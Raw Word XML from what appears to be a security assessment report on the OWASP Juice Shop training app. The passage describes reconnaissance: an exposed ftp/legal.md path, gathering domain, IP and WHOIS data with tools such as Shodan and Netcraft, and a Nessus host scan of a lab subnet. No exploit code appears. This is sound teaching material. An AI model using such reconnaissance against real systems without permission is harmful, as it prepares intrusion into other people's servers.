          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="00DB4649" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="001A2FE0" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> link to download legal documents. </w:t>
      </w:r>
      <w:r w:rsidR="00025BE5" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspecting the </w:t>
      </w:r>
      <w:r w:rsidR="00E43BE5" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>link will show a path to ftp via “ftp/legal.md”</w:t>
      </w:r>
      <w:r w:rsidR="000C22B5" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, the attacker </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000C22B5" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>discover</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0083557A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the files hosted on the website and may find valuable information.</w:t>
      </w:r>
      <w:r w:rsidR="00533B3A" w:rsidRPr="00FA5B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7017A" wp14:editId="08BE04E3">
            <wp:extent cx="5909945" cy="1424940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="12036576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7683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988" cy="142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B5EE" w14:textId="5152A3C0" w:rsidR="0083557A" w:rsidRPr="00FA5B3B" w:rsidRDefault="0083557A" w:rsidP="0083557A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4 Website ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9A5AF9" w14:textId="267B76D5" w:rsidR="00972EA3" w:rsidRPr="00FA5B3B" w:rsidRDefault="00972EA3" w:rsidP="00972EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00D82430" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Technical</w:t>
      </w:r>
      <w:r w:rsidR="00DD703A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43532A2E" w14:textId="2C6DD67C" w:rsidR="00A25F1C" w:rsidRPr="00FA5B3B" w:rsidRDefault="003F468F" w:rsidP="00F927E8">
      <w:pPr>
        <w:jc w:val="both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The attack </w:t>
      </w:r>
      <w:r w:rsidR="000A1882" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">will try to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>gather</w:t>
      </w:r>
      <w:r w:rsidR="00012328" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> information about</w:t>
      </w:r>
      <w:r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012328" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>target’s system</w:t>
      </w:r>
      <w:r w:rsidR="000A1882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817092" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>including</w:t>
      </w:r>
      <w:r w:rsidR="00F927E8" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> d</w:t>
      </w:r>
      <w:r w:rsidR="00417DB7" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>omains and sub-</w:t>
      </w:r>
      <w:r w:rsidR="000A1882" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>domains</w:t>
      </w:r>
      <w:r w:rsidR="00F927E8" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, o</w:t>
      </w:r>
      <w:r w:rsidR="00B04887" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>perating system</w:t>
      </w:r>
      <w:r w:rsidR="000612FF" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, services</w:t>
      </w:r>
      <w:r w:rsidR="00F927E8" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> l</w:t>
      </w:r>
      <w:r w:rsidR="00A2164E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ocation of the servers</w:t>
      </w:r>
      <w:r w:rsidR="00D33B53" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F927E8" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="009B3CC2" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> addresses of reachable </w:t>
      </w:r>
      <w:r w:rsidR="00817092" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>network</w:t>
      </w:r>
      <w:r w:rsidR="00D33B53" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, hosted directory, </w:t>
      </w:r>
      <w:r w:rsidR="00A64104" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>WHOIS records</w:t>
      </w:r>
      <w:r w:rsidR="00A10A6E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00897DFE" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and technology used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4534B9BE" w14:textId="382F974E" w:rsidR="00D638C9" w:rsidRPr="00FA5B3B" w:rsidRDefault="00817092" w:rsidP="00A10A6E">
      <w:pPr>
        <w:jc w:val="both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>There</w:t>
      </w:r>
      <w:r w:rsidR="002D568A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> are</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> many tools that the attacker could </w:t>
      </w:r>
      <w:r w:rsidR="00B30C73" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidR="00A134D0" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>to extract system</w:t>
      </w:r>
      <w:r w:rsidR="001E2173" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> information</w:t>
      </w:r>
      <w:r w:rsidR="00B560CA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, online tools such as </w:t>
      </w:r>
      <w:r w:rsidR="003F54B9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>centralops</w:t>
      </w:r>
      <w:r w:rsidR="002D568A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.net</w:t>
      </w:r>
      <w:r w:rsidR="003F54B9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="002D568A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>website.informer.com</w:t>
      </w:r>
      <w:r w:rsidR="00CA5F37" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004F2947" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>WHOIS</w:t>
      </w:r>
      <w:r w:rsidR="00CA5F37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7D175E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>domain lookup</w:t>
      </w:r>
      <w:r w:rsidR="00B2254A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D93C99" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sitereport.netcraft.com</w:t>
      </w:r>
      <w:r w:rsidR="00B2254A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00CC1332" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Shodan</w:t>
      </w:r>
      <w:r w:rsidR="00D47717" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00341C66" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> The report uses online-host</w:t>
      </w:r>
      <w:r w:rsidR="00C35BDB" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00341C66" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> OWASP juice</w:t>
      </w:r>
      <w:r w:rsidR="00C35BDB" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> shop</w:t>
      </w:r>
      <w:r w:rsidR="00341C66" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="00341C66" w:rsidRPr="00FA5B3B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://juice-shop.herokuapp.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00341C66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2127EA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">as an example </w:t>
      </w:r>
      <w:r w:rsidR="00341C66" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">to illustrate </w:t>
      </w:r>
      <w:r w:rsidR="002A53DB" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the usages of the tools</w:t>
      </w:r>
      <w:r w:rsidR="00A2658B" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, technology used in the example is relatively close</w:t>
      </w:r>
      <w:r w:rsidR="00D3143F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to our web </w:t>
      </w:r>
      <w:r w:rsidR="00A64104" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">application. </w:t>
      </w:r>
      <w:r w:rsidR="00E01DAB" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Refer to ap</w:t>
      </w:r>
      <w:r w:rsidR="00A43097" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pendix 1.</w:t>
      </w:r>
      <w:r w:rsidR="003F5975" w:rsidRPr="00FA5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7A038" w14:textId="6C6BFB2E" w:rsidR="00123809" w:rsidRPr="00FA5B3B" w:rsidRDefault="001A4B1A" w:rsidP="00801AB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof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9FE22F7" wp14:editId="60DBDF65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4130040" cy="2160905"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1294799468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99468" name="Picture 3" descr="A computer screen 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1" r="182"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4130040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97" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CA3476" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>In th</w:t>
      </w:r>
      <w:r w:rsidR="00801AB0" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00CA3476" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> scenario, t</w:t>
      </w:r>
      <w:r w:rsidR="00057AF5" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">he target server </w:t>
      </w:r>
      <w:r w:rsidR="00807DCC" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>IP address is</w:t>
      </w:r>
      <w:r w:rsidR="009A5D89" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.137.133</w:t>
      </w:r>
      <w:r w:rsidR="00556CC4" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="004B0E03" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">attempts </w:t>
      </w:r>
      <w:r w:rsidR="00801AB0" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>to scan</w:t>
      </w:r>
      <w:r w:rsidR="007942B2" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the network</w:t>
      </w:r>
      <w:r w:rsidR="00924292" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> via 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="002C0558" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>137.0</w:t>
      </w:r>
      <w:r w:rsidR="007942B2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E77535" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">with network scanning tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E77535" w:rsidRPr="00FA5B3B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="00E77535" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Nessus</w:t>
      </w:r>
      <w:r w:rsidR="00820DB5" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> host discovery scan.</w:t>
      </w:r>
      <w:r w:rsidR="00184DF4" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Refer to figure </w:t>
      </w:r>
      <w:r w:rsidR="00F87A38" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00184DF4" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F87A38" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00184DF4" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00F87A38" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
